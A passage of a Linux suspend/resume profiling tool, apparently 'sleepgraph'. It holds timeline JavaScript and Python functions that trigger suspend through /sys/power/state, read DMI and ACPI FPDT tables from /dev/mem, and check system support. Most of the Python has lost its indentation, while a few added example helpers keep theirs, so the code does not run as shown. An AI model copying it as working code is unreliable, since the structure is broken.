' if(document.getElementById("devicedetail1"))\n'\
' pdata = [[], []];\n'\
' var pd = pdata[0];\n'\
' var total = [0.0, 0.0, 0.0];\n'\
' for (var i = 0; i < dev.length; i++) {\n'\
' dname = deviceName(dev[i].title);\n'\
' if((cpu >= 0 && dname.match("CPU_O[NF]*\\\[*"+cpu+"\\\]")) ||\n'\
' (name == dname))\n'\
' {\n'\
' idlist[idlist.length] = dev[i].id;\n'\
' var tidx = 1;\n'\
' if(dev[i].id[0] == "a") {\n'\
' pd = pdata[0];\n'\
' } else {\n'\
' if(pdata.length == 1) pdata[1] = [];\n'\
' if(total.length == 3) total[3]=total[4]=0.0;\n'\
' pd = pdata[1];\n'\
' tidx = 3;\n'\
' }\n'\
' var info = dev[i].title.split(" ");\n'\
' var pname = info[info.length-1];\n'\
' pd[pname] = parseFloat(info[info.length-3].slice(1));\n'\
' total[0] += pd[pname];\n'\
' if(pname.indexOf("suspend") >= 0)\n'\
' total[tidx] += pd[pname];\n'\
' else\n'\
' total[tidx+1] += pd[pname];\n'\
' }\n'\
' }\n'\
' var devname = deviceTitle(this.title, total, cpu);\n'\
' var left = 0.0;\n'\
' for (var t = 0; t < pdata.length; t++) {\n'\
' pd = pdata[t];\n'\
' devinfo = document.getElementById("devicedetail"+t);\n'\
' var phases = devinfo.getElementsByClassName("phaselet");\n'\
' for (var i = 0; i < phases.length; i++) {\n'\
' if(phases[i].id in pd) {\n'\
' var w = 100.0*pd[phases[i].id]/total[0];\n'\
' var fs = 32;\n'\
' if(w < 8) fs = 4*w | 0;\n'\
' var fs2 = fs*3/4;\n'\
' phases[i].style.width = w+"%";\n'\
' phases[i].style.left = left+"%";\n'\
' phases[i].title = phases[i].id+" "+pd[phases[i].id]+" ms";\n'\
' left += w;\n'\
' var time = "<t4 style=\\"font-size:"+fs+"px\\">"+pd[phases[i].id]+" ms<br></t4>";\n'\
' var pname = "<t3 style=\\"font-size:"+fs2+"px\\">"+phases[i].id.replace(new RegExp("_", "g"), " ")+"</t3>";\n'\
' phases[i].innerHTML = time+pname;\n'\
' } else {\n'\
' phases[i].style.width = "0%";\n'\
' phases[i].style.left = left+"%";\n'\
' }\n'\
' }\n'\
' }\n'\
' if(typeof devstats !== \'undefined\')\n'\
' callDetail(this.id, this.title);\n'\
' var cglist = document.getElementById("callgraphs");\n'\
' if(!cglist) return;\n'\
' var cg = cglist.getElementsByClassName("atop");\n'\
' if(cg.length < 10) return;\n'\
' for (var i = 0; i < cg.length; i++) {\n'\
' cgid = cg[i].id.split("x")[0]\n'\
' if(idlist.indexOf(cgid) >= 0) {\n'\
' cg[i].style.display = "block";\n'\
' } else {\n'\
' cg[i].style.display = "none";\n'\
' }\n'\
' }\n'\
' }\n'\
' function callDetail(devid, devtitle) {\n'\
' if(!(devid in devstats) || devstats[devid].length < 1)\n'\
' return;\n'\
' var list = devstats[devid];\n'\
' var tmp = devtitle.split(" ");\n'\
' var name = tmp[0], phase = tmp[tmp.length-1];\n'\
' var dd = document.getElementById(phase);\n'\
' var total = parseFloat(tmp[1].slice(1));\n'\
' var mlist = [];\n'\
' var maxlen = 0;\n'\
' var info = []\n'\
' for(var i in list) {\n'\
' if(list[i][0] == "@") {\n'\
' info = list[i].split("|");\n'\
' continue;\n'\
' }\n'\
' var tmp = list[i].split("|");\n'\
' var t = parseFloat(tmp[0]), f = tmp[1], c = parseInt(tmp[2]);\n'\
' var p = (t*100.0/total).toFixed(2);\n'\
' mlist[mlist.length] = [f, c, t.toFixed(2), p+"%"];\n'\
' if(f.length > maxlen)\n'\
' maxlen = f.length;\n'\
' }\n'\
' var pad = 5;\n'\
' if(mlist.length == 0) pad = 30;\n'\
' var html = \'<div style="padding-top:\'+pad+\'px"><t3> <b>\'+name+\':</b>\';\n'\
' if(info.length > 2)\n'\
' html += " start=<b>"+info[1]+"</b>, end=<b>"+info[2]+"</b>";\n'\
' if(info.length > 3)\n'\
' html += ", length<i>(w/o overhead)</i>=<b>"+info[3]+" ms</b>";\n'\
' if(info.length > 4)\n'\
' html += ", return=<b>"+info[4]+"</b>";\n'\
' html += "</t3></div>";\n'\
' if(mlist.length > 0) {\n'\
' html += \'<table class=fstat style="padding-top:\'+(maxlen*5)+\'px;"><tr><th>Function</th>\';\n'\
' for(var i in mlist)\n'\
' html += "<td class=vt>"+mlist[i][0]+"</td>";\n'\
' html += "</tr><tr><th>Calls</th>";\n'\
' for(var i in mlist)\n'\
' html += "<td>"+mlist[i][1]+"</td>";\n'\
' html += "</tr><tr><th>Time(ms)</th>";\n'\
' for(var i in mlist)\n'\
' html += "<td>"+mlist[i][2]+"</td>";\n'\
' html += "</tr><tr><th>Percent</th>";\n'\
' for(var i in mlist)\n'\
' html += "<td>"+mlist[i][3]+"</td>";\n'\
' html += "</tr></table>";\n'\
' }\n'\
' dd.innerHTML = html;\n'\
' var height = (maxlen*5)+100;\n'\
' dd.style.height = height+"px";\n'\
' document.getElementById("devicedetail").style.height = height+"px";\n'\
' }\n'\
' function callSelect() {\n'\
' var cglist = document.getElementById("callgraphs");\n'\
' if(!cglist) return;\n'\
' var cg = cglist.getElementsByClassName("atop");\n'\
' for (var i = 0; i < cg.length; i++) {\n'\
' if(this.id == cg[i].id) {\n'\
' cg[i].style.display = "block";\n'\
' } else {\n'\
' cg[i].style.display = "none";\n'\
' }\n'\
' }\n'\
' }\n'\
' function devListWindow(e) {\n'\
' var win = window.open();\n'\
' var html = "<title>"+e.target.innerHTML+"</title>"+\n'\
' "<style type=\\"text/css\\">"+\n'\
' " ul {list-style-type:circle;padding-left:10px;margin-left:10px;}"+\n'\
' "</style>"\n'\
' var dt = devtable[0];\n'\
' if(e.target.id != "devlist1")\n'\
' dt = devtable[1];\n'\
' win.document.write(html+dt);\n'\
' }\n'\
' function errWindow() {\n'\
' var range = this.id.split("_");\n'\
' var idx1 = parseInt(range[0]);\n'\
' var idx2 = parseInt(range[1]);\n'\
' var win = window.open();\n'\
' var log = document.getElementById("dmesglog");\n'\
' var title = "<title>dmesg log</title>";\n'\
' var text = log.innerHTML.split("\\n");\n'\
' var html = "";\n'\
' for(var i = 0; i < text.length; i++) {\n'\
' if(i == idx1) {\n'\
' html += "<e id=target>"+text[i]+"</e>\\n";\n'\
' } else if(i > idx1 && i <= idx2) {\n'\
' html += "<e>"+text[i]+"</e>\\n";\n'\
' } else {\n'\
' html += text[i]+"\\n";\n'\
' }\n'\
' }\n'\
' win.document.write("<style>e{color:red}</style>"+title+"<pre>"+html+"</pre>");\n'\
' win.location.hash = "#target";\n'\
' win.document.close();\n'\
' }\n'\
' function logWindow(e) {\n'\
' var name = e.target.id.slice(4);\n'\
' var win = window.open();\n'\
' var log = document.getElementById(name+"log");\n'\
' var title = "<title>"+document.title.split(" ")[0]+" "+name+" log</title>";\n'\
' win.document.write(title+"<pre>"+log.innerHTML+"</pre>");\n'\
' win.document.close();\n'\
' }\n'\
' function onMouseDown(e) {\n'\
' dragval[0] = e.clientX;\n'\
' dragval[1] = document.getElementById("dmesgzoombox").scrollLeft;\n'\
' document.onmousemove = onMouseMove;\n'\
' }\n'\
' function onMouseMove(e) {\n'\
' var zoombox = document.getElementById("dmesgzoombox");\n'\
' zoombox.scrollLeft = dragval[1] + dragval[0] - e.clientX;\n'\
' }\n'\
' function onMouseUp(e) {\n'\
' document.onmousemove = null;\n'\
' }\n'\
' function onKeyPress(e) {\n'\
' var c = e.charCode;\n'\
' if(c != 42 && c != 43 && c != 45) return;\n'\
' var click = document.createEvent("Events");\n'\
' click.initEvent("click", true, false);\n'\
' if(c == 43) \n'\
' document.getElementById("zoomin").dispatchEvent(click);\n'\
' else if(c == 45)\n'\
' document.getElementById("zoomout").dispatchEvent(click);\n'\
' else if(c == 42)\n'\
' document.getElementById("zoomdef").dispatchEvent(click);\n'\
' }\n'\
' window.addEventListener("resize", function () {zoomTimeline();});\n'\
' window.addEventListener("load", function () {\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' dmesg.style.width = "100%"\n'\
' dmesg.onmousedown = onMouseDown;\n'\
' document.onmouseup = onMouseUp;\n'\
' document.onkeypress = onKeyPress;\n'\
' document.getElementById("zoomin").onclick = zoomTimeline;\n'\
' document.getElementById("zoomout").onclick = zoomTimeline;\n'\
' document.getElementById("zoomdef").onclick = zoomTimeline;\n'\
' var list = document.getElementsByClassName("err");\n'\
' for (var i = 0; i < list.length; i++)\n'\
' list[i].onclick = errWindow;\n'\
' var list = document.getElementsByClassName("logbtn");\n'\
' for (var i = 0; i < list.length; i++)\n'\
' list[i].onclick = logWindow;\n'\
' list = document.getElementsByClassName("devlist");\n'\
' for (var i = 0; i < list.length; i++)\n'\
' list[i].onclick = devListWindow;\n'\
' var dev = dmesg.getElementsByClassName("thread");\n'\
' for (var i = 0; i < dev.length; i++) {\n'\
' dev[i].onclick = deviceDetail;\n'\
' dev[i].onmouseover = deviceHover;\n'\
' dev[i].onmouseout = deviceUnhover;\n'\
' }\n'\
' var dev = dmesg.getElementsByClassName("srccall");\n'\
' for (var i = 0; i < dev.length; i++)\n'\
' dev[i].onclick = callSelect;\n'\
' zoomTimeline();\n'\
' });\n'\
'</script>\n'
hf.write(script_code);
# Function: executeSuspend
# Description:
# Execute system suspend through the sysfs interface, then copy the output
# dmesg and ftrace files to the test output directory.
def executeSuspend(quiet=False):
sv, tp, pm = sysvals, sysvals.tpath, ProcessMonitor()
if sv.wifi:
wifi = sv.checkWifi()
sv.dlog('wifi check, connected device is "%s"' % wifi)
testdata = []
# run these commands to prepare the system for suspend
if sv.display:
if not quiet:
pprint('SET DISPLAY TO %s' % sv.display.upper())
ret = sv.displayControl(sv.display)
sv.dlog('xset display %s, ret = %d' % (sv.display, ret))
time.sleep(1)
if sv.sync:
if not quiet:
pprint('SYNCING FILESYSTEMS')
sv.dlog('syncing filesystems')
call('sync', shell=True)
sv.dlog('read dmesg')
sv.initdmesg()
# start ftrace
if(sv.usecallgraph or sv.usetraceevents):
if not quiet:
pprint('START TRACING')
sv.dlog('start ftrace tracing')
sv.fsetVal('1', 'tracing_on')
if sv.useprocmon:
sv.dlog('start the process monitor')
pm.start()
sv.dlog('run the cmdinfo list before')
sv.cmdinfo(True)
# execute however many s/r runs requested
for count in range(1,sv.execcount+1):
# x2delay in between test runs
if(count > 1 and sv.x2delay > 0):
sv.fsetVal('WAIT %d' % sv.x2delay, 'trace_marker')
time.sleep(sv.x2delay/1000.0)
sv.fsetVal('WAIT END', 'trace_marker')
# start message
if sv.testcommand != '':
pprint('COMMAND START')
else:
if(sv.rtcwake):
pprint('SUSPEND START')
else:
pprint('SUSPEND START (press a key to resume)')
# set rtcwake
if(sv.rtcwake):
if not quiet:
pprint('will issue an rtcwake in %d seconds' % sv.rtcwaketime)
sv.dlog('enable RTC wake alarm')
sv.rtcWakeAlarmOn()
# start of suspend trace marker
if(sv.usecallgraph or sv.usetraceevents):
sv.fsetVal(datetime.now().strftime(sv.tmstart), 'trace_marker')
# predelay delay
if(count == 1 and sv.predelay > 0):
sv.fsetVal('WAIT %d' % sv.predelay, 'trace_marker')
time.sleep(sv.predelay/1000.0)
sv.fsetVal('WAIT END', 'trace_marker')
# initiate suspend or command
sv.dlog('system executing a suspend')
tdata = {'error': ''}
if sv.testcommand != '':
res = call(sv.testcommand+' 2>&1', shell=True);
if res != 0:
tdata['error'] = 'cmd returned %d' % res
else:
mode = sv.suspendmode
if sv.memmode and os.path.exists(sv.mempowerfile):
mode = 'mem'
sv.testVal(sv.mempowerfile, 'radio', sv.memmode)
if sv.diskmode and os.path.exists(sv.diskpowerfile):
mode = 'disk'
sv.testVal(sv.diskpowerfile, 'radio', sv.diskmode)
if sv.acpidebug:
sv.testVal(sv.acpipath, 'acpi', '0xe')
if mode == 'freeze' and sv.haveTurbostat():
# execution will pause here
turbo = sv.turbostat()
if turbo:
tdata['turbo'] = turbo
else:
pf = open(sv.powerfile, 'w')
pf.write(mode)
# execution will pause here
try:
pf.close()
except Exception as e:
tdata['error'] = str(e)
sv.dlog('system returned from resume')
# reset everything
sv.testVal('restoreall')
if(sv.rtcwake):
sv.dlog('disable RTC wake alarm')
sv.rtcWakeAlarmOff()
# postdelay delay
if(count == sv.execcount and sv.postdelay > 0):
sv.fsetVal('WAIT %d' % sv.postdelay, 'trace_marker')
time.sleep(sv.postdelay/1000.0)
sv.fsetVal('WAIT END', 'trace_marker')
# return from suspend
pprint('RESUME COMPLETE')
if(sv.usecallgraph or sv.usetraceevents):
sv.fsetVal(datetime.now().strftime(sv.tmend), 'trace_marker')
if sv.wifi and wifi:
tdata['wifi'] = sv.pollWifi(wifi)
sv.dlog('wifi check, %s' % tdata['wifi'])
if(sv.suspendmode == 'mem' or sv.suspendmode == 'command'):
sv.dlog('read the ACPI FPDT')
tdata['fw'] = getFPDT(False)
testdata.append(tdata)
sv.dlog('run the cmdinfo list after')
cmdafter = sv.cmdinfo(False)
# stop ftrace
if(sv.usecallgraph or sv.usetraceevents):
if sv.useprocmon:
sv.dlog('stop the process monitor')
pm.stop()
sv.fsetVal('0', 'tracing_on')
# grab a copy of the dmesg output
if not quiet:
pprint('CAPTURING DMESG')
sysvals.dlog('EXECUTION TRACE END')
sv.getdmesg(testdata)
# grab a copy of the ftrace output
if(sv.usecallgraph or sv.usetraceevents):
if not quiet:
pprint('CAPTURING TRACE')
op = sv.writeDatafileHeader(sv.ftracefile, testdata)
fp = open(tp+'trace', 'r')
for line in fp:
op.write(line)
op.close()
sv.fsetVal('', 'trace')
sv.platforminfo(cmdafter)
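# The suspend step above ultimately amounts to writing the mode name into
# /sys/power/state and letting the write block until the machine resumes.
# A minimal standalone sketch of just that step (hypothetical helper, not
# called anywhere in this script; requires root and a configured wake source
# such as an rtcwake alarm):
def exampleSysfsSuspend(mode='mem', statefile='/sys/power/state'):
    # check the mode against what the kernel advertises before writing
    with open(statefile, 'r') as fp:
        avail = fp.read().split()
    if mode not in avail:
        raise ValueError('mode "%s" not in %s' % (mode, avail))
    # this write blocks here until the system has resumed
    with open(statefile, 'w') as fp:
        fp.write(mode)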
def readFile(file):
if os.path.islink(file):
return os.readlink(file).split('/')[-1]
else:
return sysvals.getVal(file).strip()
# Function: ms2nice
# Description:
# Convert a millisecond count into a short h:mm:ss / mm:ss / Ns time string
# Output:
# The time string, e.g. "1:10:15", "12:34" or "5s"
def ms2nice(val):
val = int(val)
h = val // 3600000
m = (val // 60000) % 60
s = (val // 1000) % 60
if h > 0:
return '%d:%02d:%02d' % (h, m, s)
if m > 0:
return '%02d:%02d' % (m, s)
return '%ds' % s
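# A quick self-check of the formatter above; the inputs are made-up
# millisecond counts, chosen only to exercise each of the three branches.
def exampleMs2niceCheck():
    assert ms2nice(5250) == '5s'
    assert ms2nice(754000) == '12:34'
    assert ms2nice(4215000) == '1:10:15'
    return True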
def yesno(val):
list = {'enabled':'A', 'disabled':'S', 'auto':'E', 'on':'D',
'active':'A', 'suspended':'S', 'suspending':'S'}
if val not in list:
return ' '
return list[val]
# Function: deviceInfo
# Description:
# Detect all devices that support runtime suspend and print their runtime
# PM settings, or return their power/control file paths when output is set
def deviceInfo(output=''):
if not output:
pprint('LEGEND\n'\
'---------------------------------------------------------------------------------------------\n'\
' A = async/sync PM queue (A/S) C = runtime active children\n'\
' R = runtime suspend enabled/disabled (E/D) rACTIVE = runtime active (min/sec)\n'\
' S = runtime status active/suspended (A/S) rSUSPEND = runtime suspend (min/sec)\n'\
' U = runtime usage count\n'\
'---------------------------------------------------------------------------------------------\n'\
'DEVICE NAME A R S U C rACTIVE rSUSPEND\n'\
'---------------------------------------------------------------------------------------------')
res = []
tgtval = 'runtime_status'
lines = dict()
for dirname, dirnames, filenames in os.walk('/sys/devices'):
if(not re.match('.*/power', dirname) or
'control' not in filenames or
tgtval not in filenames):
continue
name = ''
dirname = dirname[:-6]
device = dirname.split('/')[-1]
power = dict()
power[tgtval] = readFile('%s/power/%s' % (dirname, tgtval))
# only list devices which support runtime suspend
if power[tgtval] not in ['active', 'suspended', 'suspending']:
continue
for i in ['product', 'driver', 'subsystem']:
file = '%s/%s' % (dirname, i)
if os.path.exists(file):
name = readFile(file)
break
for i in ['async', 'control', 'runtime_status', 'runtime_usage',
'runtime_active_kids', 'runtime_active_time',
'runtime_suspended_time']:
if i in filenames:
power[i] = readFile('%s/power/%s' % (dirname, i))
if output:
if power['control'] == output:
res.append('%s/power/control' % dirname)
continue
lines[dirname] = '%-26s %-26s %1s %1s %1s %1s %1s %10s %10s' % \
(device[:26], name[:26],
yesno(power['async']), \
yesno(power['control']), \
yesno(power['runtime_status']), \
power['runtime_usage'], \
power['runtime_active_kids'], \
ms2nice(power['runtime_active_time']), \
ms2nice(power['runtime_suspended_time']))
for i in sorted(lines):
print(lines[i])
return res
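# A minimal, read-only sketch of the sysfs walk deviceInfo performs: find
# every device exposing runtime PM data and collect its current status
# (illustrative helper, not used by the tool; it only reads the standard
# /sys/devices power files):
def exampleRuntimePMStatus(root='/sys/devices'):
    import os
    status = dict()
    for dirname, dirnames, filenames in os.walk(root):
        if not dirname.endswith('/power') or 'runtime_status' not in filenames:
            continue
        device = dirname[:-6].split('/')[-1]
        with open(os.path.join(dirname, 'runtime_status'), 'r') as fp:
            status[device] = fp.read().strip()
    return status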
# Function: getModes
# Description:
# Determine the supported power modes on this system
# Output:
# A string list of the available modes
def getModes():
modes = []
if(os.path.exists(sysvals.powerfile)):
fp = open(sysvals.powerfile, 'r')
modes = fp.read().split()
fp.close()
if(os.path.exists(sysvals.mempowerfile)):
deep = False
fp = open(sysvals.mempowerfile, 'r')
for m in fp.read().split():
memmode = m.strip('[]')
if memmode == 'deep':
deep = True
else:
modes.append('mem-%s' % memmode)
fp.close()
if 'mem' in modes and not deep:
modes.remove('mem')
if('disk' in modes and os.path.exists(sysvals.diskpowerfile)):
fp = open(sysvals.diskpowerfile, 'r')
for m in fp.read().split():
modes.append('disk-%s' % m.strip('[]'))
fp.close()
return modes
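# The list above is assembled from three sysfs files: /sys/power/state holds
# the top-level modes, /sys/power/mem_sleep the s2idle/shallow/deep variants
# (the active one in brackets), and /sys/power/disk the hibernate variants.
# An illustrative read of all three, independent of sysvals:
def exampleReadPowerModes():
    import os
    modes = dict()
    for name in ['state', 'mem_sleep', 'disk']:
        path = '/sys/power/' + name
        if not os.path.exists(path):
            modes[name] = []
            continue
        with open(path, 'r') as fp:
            modes[name] = fp.read().split()
    return modes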
# Function: dmidecode
# Description:
# Read the bios tables and pull out system info
# Arguments:
# mempath: /dev/mem or custom mem path
# fatal: True to exit on error, False to return empty dict
# Output:
# A dict object with all available key/values
def dmidecode(mempath, fatal=False):
out = dict()
# the list of values to retrieve, with hardcoded (type, idx)
info = {
'bios-vendor': (0, 4),
'bios-version': (0, 5),
'bios-release-date': (0, 8),
'system-manufacturer': (1, 4),
'system-product-name': (1, 5),
'system-version': (1, 6),
'system-serial-number': (1, 7),
'baseboard-manufacturer': (2, 4),
'baseboard-product-name': (2, 5),
'baseboard-version': (2, 6),
'baseboard-serial-number': (2, 7),
'chassis-manufacturer': (3, 4),
'chassis-type': (3, 5),
'chassis-version': (3, 6),
'chassis-serial-number': (3, 7),
'processor-manufacturer': (4, 7),
'processor-version': (4, 16),
}
if(not os.path.exists(mempath)):
if(fatal):
doError('file does not exist: %s' % mempath)
return out
if(not os.access(mempath, os.R_OK)):
if(fatal):
doError('file is not readable: %s' % mempath)
return out
# by default use legacy scan, but try to use EFI first
memaddr = 0xf0000
memsize = 0x10000
for ep in ['/sys/firmware/efi/systab', '/proc/efi/systab']:
if not os.path.exists(ep) or not os.access(ep, os.R_OK):
continue
fp = open(ep, 'r')
buf = fp.read()
fp.close()
i = buf.find('SMBIOS=')
if i >= 0:
try:
memaddr = int(buf[i+7:], 16)
memsize = 0x20
except:
continue
# read in the memory for scanning
try:
fp = open(mempath, 'rb')
fp.seek(memaddr)
buf = fp.read(memsize)
except:
if(fatal):
doError('DMI table is unreachable, sorry')
else:
pprint('WARNING: /dev/mem is not readable, ignoring DMI data')
return out
fp.close()
# search for either an SM table or DMI table
i = base = length = num = 0
while(i < memsize):
if buf[i:i+4] == b'_SM_' and i < memsize - 16:
length = struct.unpack('H', buf[i+22:i+24])[0]
base, num = struct.unpack('IH', buf[i+24:i+30])
break
elif buf[i:i+5] == b'_DMI_':
length = struct.unpack('H', buf[i+6:i+8])[0]
base, num = struct.unpack('IH', buf[i+8:i+14])
break
i += 16
if base == 0 and length == 0 and num == 0:
if(fatal):
doError('Neither SMBIOS nor DMI were found')
else:
return out
# read in the SM or DMI table
try:
fp = open(mempath, 'rb')
fp.seek(base)
buf = fp.read(length)
except:
if(fatal):
doError('DMI table is unreachable, sorry')
else:
pprint('WARNING: /dev/mem is not readable, ignoring DMI data')
return out
fp.close()
# scan the table for the values we want
count = i = 0
while(count < num and i <= len(buf) - 4):
type, size, handle = struct.unpack('BBH', buf[i:i+4])
n = i + size
while n < len(buf) - 1:
if 0 == struct.unpack('H', buf[n:n+2])[0]:
break
n += 1
data = buf[i+size:n+2].split(b'\0')
for name in info:
itype, idxadr = info[name]
if itype == type:
idx = struct.unpack('B', buf[i+idxadr:i+idxadr+1])[0]
if idx > 0 and idx < len(data) - 1:
s = data[idx-1].decode('utf-8')
if s.strip() and s.strip().lower() != 'to be filled by o.e.m.':
out[name] = s
i = n + 2
count += 1
return out
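# Each SMBIOS structure stores its text fields as 1-based indexes into a
# NUL-separated string set that follows the formatted area; the inner loop
# above resolves those indexes. A toy illustration with a synthetic buffer
# (type 0, formatted length 5, one index byte pointing at the second string):
def exampleSmbiosStringLookup():
    import struct
    buf = struct.pack('BBHB', 0, 5, 0, 2) + b'VendorX\0v1.23\0\0'
    stype, size, handle = struct.unpack('BBH', buf[0:4])
    idx = struct.unpack('B', buf[4:5])[0]
    strings = buf[size:].split(b'\0')
    return strings[idx-1].decode('utf-8')    # -> 'v1.23'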
# Function: getFPDT
# Description:
# Read the acpi bios tables and pull out FPDT, the firmware data
# Arguments:
# output: True to output the info to stdout, False otherwise
def getFPDT(output):
rectype = {}
rectype[0] = 'Firmware Basic Boot Performance Record'
rectype[1] = 'S3 Performance Table Record'
prectype = {}
prectype[0] = 'Basic S3 Resume Performance Record'
prectype[1] = 'Basic S3 Suspend Performance Record'
sysvals.rootCheck(True)
if(not os.path.exists(sysvals.fpdtpath)):
if(output):
doError('file does not exist: %s' % sysvals.fpdtpath)
return False
if(not os.access(sysvals.fpdtpath, os.R_OK)):
if(output):
doError('file is not readable: %s' % sysvals.fpdtpath)
return False
if(not os.path.exists(sysvals.mempath)):
if(output):
doError('file does not exist: %s' % sysvals.mempath)
return False
if(not os.access(sysvals.mempath, os.R_OK)):
if(output):
doError('file is not readable: %s' % sysvals.mempath)
return False
fp = open(sysvals.fpdtpath, 'rb')
buf = fp.read()
fp.close()
if(len(buf) < 36):
if(output):
doError('Invalid FPDT table data, should '+\
'be at least 36 bytes')
return False
table = struct.unpack('4sIBB6s8sI4sI', buf[0:36])
if(output):
pprint('\n'\
'Firmware Performance Data Table (%s)\n'\
' Signature : %s\n'\
' Table Length : %u\n'\
' Revision : %u\n'\
' Checksum : 0x%x\n'\
' OEM ID : %s\n'\
' OEM Table ID : %s\n'\
' OEM Revision : %u\n'\
' Creator ID : %s\n'\
' Creator Revision : 0x%x\n'\
'' % (ascii(table[0]), ascii(table[0]), table[1], table[2],
table[3], ascii(table[4]), ascii(table[5]), table[6],
ascii(table[7]), table[8]))
if(table[0] != b'FPDT'):
if(output):
doError('Invalid FPDT table')
return False
if(len(buf) <= 36):
return False
i = 0
fwData = [0, 0]
records = buf[36:]
try:
fp = open(sysvals.mempath, 'rb')
except:
pprint('WARNING: /dev/mem is not readable, ignoring the FPDT data')
return False
while(i < len(records)):
header = struct.unpack('HBB', records[i:i+4])
if(header[0] not in rectype):
i += header[1]
continue
if(header[1] != 16):
i += header[1]
continue
addr = struct.unpack('Q', records[i+8:i+16])[0]
try:
fp.seek(addr)
first = fp.read(8)
except:
if(output):
pprint('Bad address 0x%x in %s' % (addr, sysvals.mempath))
return [0, 0]
rechead = struct.unpack('4sI', first)
recdata = fp.read(rechead[1]-8)
if(rechead[0] == b'FBPT'):
record = struct.unpack('HBBIQQQQQ', recdata[:48])
if(output):
pprint('%s (%s)\n'\
' Reset END : %u ns\n'\
' OS Loader LoadImage Start : %u ns\n'\
' OS Loader StartImage Start : %u ns\n'\
' ExitBootServices Entry : %u ns\n'\
' ExitBootServices Exit : %u ns'\
'' % (rectype[header[0]], ascii(rechead[0]), record[4], record[5],
record[6], record[7], record[8]))
elif(rechead[0] == b'S3PT'):
if(output):
pprint('%s (%s)' % (rectype[header[0]], ascii(rechead[0])))
j = 0
while(j < len(recdata)):
prechead = struct.unpack('HBB', recdata[j:j+4])
if(prechead[0] not in prectype):
# advance past unknown sub-record types instead of spinning forever
j += prechead[1]
continue
if(prechead[0] == 0):
record = struct.unpack('IIQQ', recdata[j:j+prechead[1]])
fwData[1] = record[2]
if(output):
pprint(' %s\n'\
' Resume Count : %u\n'\
' FullResume : %u ns\n'\
' AverageResume : %u ns'\
'' % (prectype[prechead[0]], record[1],
record[2], record[3]))
elif(prechead[0] == 1):
record = struct.unpack('QQ', recdata[j+4:j+prechead[1]])
fwData[0] = record[1] - record[0]
if(output):
pprint(' %s\n'\
' SuspendStart : %u ns\n'\
' SuspendEnd : %u ns\n'\
' SuspendTime : %u ns'\
'' % (prectype[prechead[0]], record[0],
record[1], fwData[0]))
j += prechead[1]
if(output):
pprint('')
i += header[1]
fp.close()
return fwData
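# The S3 suspend sub-record parsed above is just two 64-bit nanosecond
# timestamps; the reported suspend time is their difference. A synthetic
# illustration (the values are made up):
def exampleFPDTSuspendRecord():
    import struct
    rec = struct.pack('QQ', 1000000, 3500000)
    start, end = struct.unpack('QQ', rec)
    return end - start    # -> 2500000 ns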
# Function: statusCheck
# Description:
# Verify that the requested command and options will work, and
# print the results to the terminal
# Output:
# True if the test will work, False if not
def statusCheck(probecheck=False):
status = ''
pprint('Checking this system (%s)...' % platform.node())
# check we have root access
res = sysvals.colorText('NO (No features of this tool will work!)')
if(sysvals.rootCheck(False)):
res = 'YES'
pprint(' have root access: %s' % res)
if(res != 'YES'):
pprint(' Try running this script with sudo')
return 'missing root access'
# check sysfs is mounted
res = sysvals.colorText('NO (No features of this tool will work!)')
if(os.path.exists(sysvals.powerfile)):
res = 'YES'
pprint(' is sysfs mounted: %s' % res)
if(res != 'YES'):
return 'sysfs is missing'
# check target mode is a valid mode
if sysvals.suspendmode != 'command':
res = sysvals.colorText('NO')
modes = getModes()
if(sysvals.suspendmode in modes):
res = 'YES'
else:
status = '%s mode is not supported' % sysvals.suspendmode
pprint(' is "%s" a valid power mode: %s' % (sysvals.suspendmode, res))
if(res == 'NO'):
pprint(' valid power modes are: %s' % modes)
pprint(' please choose one with -m')
# check if ftrace is available
res = sysvals.colorText('NO')
ftgood = sysvals.verifyFtrace()
if(ftgood):
res = 'YES'
elif(sysvals.usecallgraph):
status = 'ftrace is not properly supported'
pprint(' is ftrace supported: %s' % res)
# check if kprobes are available
if sysvals.usekprobes:
res = sysvals.colorText('NO')
sysvals.usekprobes = sysvals.verifyKprobes()
if(sysvals.usekprobes):
res = 'YES'
else:
sysvals.usedevsrc = False
pprint(' are kprobes supported: %s' % res)
# what data source are we using
res = 'DMESG'
if(ftgood):
sysvals.usetraceevents = True
for e in sysvals.traceevents:
if not os.path.exists(sysvals.epath+e):
sysvals.usetraceevents = False
if(sysvals.usetraceevents):
res = 'FTRACE (all trace events found)'
pprint(' timeline data source: %s' % res)
# check if rtcwake
res = sysvals.colorText('NO')
if(sysvals.rtcpath != ''):
res = 'YES'
elif(sysvals.rtcwake):
status = 'rtcwake is not properly supported'
pprint(' is rtcwake supported: %s' % res)
# check info commands
pprint(' optional commands this tool may use for info:')
no = sysvals.colorText('MISSING')
yes = sysvals.colorText('FOUND', 32)
for c in ['turbostat', 'mcelog', 'lspci', 'lsusb']:
if c == 'turbostat':
res = yes if sysvals.haveTurbostat() else no
else:
res = yes if sysvals.getExec(c) else no
pprint(' %s: %s' % (c, res))
if not probecheck:
return status
# verify kprobes
if sysvals.usekprobes:
for name in sysvals.tracefuncs:
sysvals.defaultKprobe(name, sysvals.tracefuncs[name])
if sysvals.usedevsrc:
for name in sysvals.dev_tracefuncs:
sysvals.defaultKprobe(name, sysvals.dev_tracefuncs[name])
sysvals.addKprobes(True)
return status
# Function: doError
# Description:
# generic error function for catastrophic failures
# Arguments:
# msg: the error message to print
# help: True if printHelp should be called after, False otherwise
def doError(msg, help=False):
if(help == True):
printHelp()
pprint('ERROR: %s\n' % msg)
sysvals.outputResult({'error':msg})
sys.exit(1)
# Function: getArgInt
# Description:
# pull out an integer argument from the command line with checks
def getArgInt(name, args, min, max, main=True):
if main:
try:
arg = next(args)
except:
doError(name+': no argument supplied', True)
else:
arg = args
try:
val = int(arg)
except:
doError(name+': non-integer value given', True)
if(val < min or val > max):
doError(name+': value should be between %d and %d' % (min, max), True)
return val
# Function: getArgFloat
# Description:
# pull out a float argument from the command line with checks
def getArgFloat(name, args, min, max, main=True):
if main:
try:
arg = next(args)
except:
doError(name+': no argument supplied', True)
else:
arg = args
try:
val = float(arg)
except:
doError(name+': non-numerical value given', True)
if(val < min or val > max):
doError(name+': value should be between %f and %f' % (min, max), True)
return val
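# The two helpers above serve both parsing paths: with main=True they consume
# the next token from the argv iterator, with main=False they validate a
# string already pulled from a config file. A small usage sketch with
# made-up values:
def exampleArgParsing():
    args = iter(['-x2delay', '1500'])
    out = dict()
    for arg in args:
        if arg == '-x2delay':
            out['cmdline'] = getArgInt('-x2delay', args, 0, 60000)
    out['config'] = getArgFloat('mindev', '0.5', 0.0, 10000.0, False)
    return out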
